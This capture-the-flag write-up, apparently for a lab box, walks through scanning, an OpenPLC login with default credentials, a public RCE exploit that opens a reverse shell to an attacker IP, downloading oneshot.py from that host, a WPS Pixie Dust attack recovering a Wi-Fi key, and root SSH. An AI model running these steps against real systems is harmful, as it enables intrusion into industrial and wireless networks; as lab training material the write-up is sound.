Basic information

Port scan

22,8080:

$ nmap -sC -sV 10.10.11.7
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-20 14:22 CST
Nmap scan report for 10.10.11.7
Host is up (0.13s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open http-proxy Werkzeug/1.0.1 Python/2.7.18
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| content-type: text/html; charset=utf-8
| content-length: 232
| vary: Cookie
| set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.ZfqAOw.xhR8Ct1rU_ysxAubmdd7vRWUafI; Expires=Wed, 20-Mar-2024 06:25:43 GMT; HttpOnly; Path=/
| server: Werkzeug/1.0.1 Python/2.7.18
| date: Wed, 20 Mar 2024 06:20:43 GMT
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 302 FOUND
| content-type: text/html; charset=utf-8
| content-length: 219
| location: http://0.0.0.0:8080/login
| vary: Cookie
| set-cookie: session=eyJfZnJlc2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlfQ.ZfqAOw.TJqwQfRBdoHKUpteR1V8fskjJCM; Expires=Wed, 20-Mar-2024 06:25:43 GMT; HttpOnly; Path=/
| server: Werkzeug/1.0.1 Python/2.7.18
| date: Wed, 20 Mar 2024 06:20:43 GMT
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>Redirecting...</title>
| <h1>Redirecting...</h1>
| <p>You should be redirected automatically to target URL: <a href="/login">/login</a>. If not click the link.
| HTTPOptions:
| HTTP/1.0 200 OK
| content-type: text/html; charset=utf-8
| allow: HEAD, OPTIONS, GET
| vary: Cookie
| set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.ZfqAOw.xhR8Ct1rU_ysxAubmdd7vRWUafI; Expires=Wed, 20-Mar-2024 06:25:43 GMT; HttpOnly; Path=/
| content-length: 0
| server: Werkzeug/1.0.1 Python/2.7.18
| date: Wed, 20 Mar 2024 06:20:43 GMT
| RTSPRequest:
| HTTP/1.1 400 Bad request
| content-length: 90
| cache-control: no-cache
| content-type: text/html
| connection: close
| <html><body><h1>400 Bad request</h1>
| Your browser sent an invalid request.
|_ </body></html>
|_http-server-header: Werkzeug/1.0.1 Python/2.7.18
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was http://10.10.11.7:8080/login
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.79 seconds

8080

Openplc:

OpenPLC

Log in with the default credentials:

openplc:openplc

OpenPLC RCE

Judging from the information shown on the page, everything dates to around 2018, so this is a fairly old version; a search turns up an existing exploit:

The exploit code needs a small modification: change the .st file name in the code to match a program that already exists on the system:

681871.st -> blank_program.st

Then run the exploit and get a root shell in the container:

python3 49803.py -u http://10.10.11.7:8080/ -l openplc -p openplc -i 10.10.16.5 -r 4444

user flag

Inside the container, user.txt is in the root directory:

Information

Listing the network interfaces reveals a wlan0, and the hostname itself is also wireless-related:

plcrouter

So the next step is to look at the wireless side; a scan finds one access point:

iwlist wlan0 scan

ESSID:"plcrouter"

WPS Pixie Dust Attack

What follows is a basic WPS Pixie Dust attack to recover the PSK:

curl http://10.10.16.5:7777/oneshot.py -o oneshot.py

python3 oneshot.py -i wlan0 --iface-down -K

[+] WPS PIN: '12345670'
[+] WPA PSK: 'NoWWEDoKnowWhaTisReal123!'
[+] AP SSID: 'plcrouter'

Wi-Fi

With the password in hand, we can try connecting to the Wi-Fi network:

wpa_passphrase plcrouter NoWWEDoKnowWhaTisReal123! | sudo tee /etc/wpa_supplicant.conf

sudo wpa_supplicant -B -c /etc/wpa_supplicant.conf -i wlan0
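As an added illustration (not part of the original write-up) of what the `wpa_passphrase` step above does: the 256-bit WPA2 PSK is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4096 iterations, 32 bytes. The block reproduces that derivation for the recovered `plcrouter` credentials, emits the equivalent `wpa_supplicant` network block without the `#psk="..."` plaintext comment that `wpa_passphrase` leaves in the file, and adds a small audit check for that comment; `derive_psk`, `network_block` and `contains_plaintext_psk` are names chosen here, not part of any tool.

```python
"""Added example: reproduce the wpa_passphrase PSK derivation and write a
wpa_supplicant network block that keeps only the derived hex key."""
import hashlib
import re

# Credentials as recovered in the write-up above (constructed input for this example).
SSID = "plcrouter"
PASSPHRASE = "NoWWEDoKnowWhaTisReal123!"


def derive_psk(ssid: str, passphrase: str) -> str:
    """WPA2-PSK = PBKDF2-HMAC-SHA1(passphrase, salt=ssid, 4096 iterations, 32 bytes), as hex."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8..63 ASCII characters")
    if not 1 <= len(ssid.encode()) <= 32:
        raise ValueError("SSID must be 1..32 bytes")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32).hex()


def network_block(ssid: str, passphrase: str) -> str:
    """Same shape as wpa_passphrase output, minus the '#psk="..."' plaintext comment.

    wpa_passphrase prints the passphrase back as a comment, so piping it into
    /etc/wpa_supplicant.conf leaves the cleartext secret on disk next to the key.
    """
    return "\n".join([
        "network={",
        f'\tssid="{ssid}"',
        f"\tpsk={derive_psk(ssid, passphrase)}",
        "}",
        "",
    ])


def contains_plaintext_psk(conf: str) -> bool:
    """Audit helper: True if a config still carries a quoted passphrase (psk="..." or #psk="...")."""
    return re.search(r'^\s*#?\s*psk="', conf, re.MULTILINE) is not None


if __name__ == "__main__":
    print(network_block(SSID, PASSPHRASE))
```

The derived hex key is still sufficient to join the network, so the config file needs restrictive permissions whichever form is stored.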

After connecting, however, no IP address is assigned automatically, and requesting one manually via DHCP will most likely crash:

sudo dhclient wlan0

wlan service

So we need to change the service configuration and restart the services to obtain an address:

echo '
[Match]
Name=wlan0
[Network]
DHCP=ipv4
' > /etc/systemd/network/25-wlan.network

systemctl enable wpa_supplicant@wlan0.service

systemctl restart systemd-networkd.service
systemctl restart wpa_supplicant@wlan0.service

Checking again afterwards, an IP address has now been assigned:

root flag

We can then probe the Wi-Fi subnet, or simply guess 192.168.1.1, and log straight in:

ssh root@192.168.1.1

References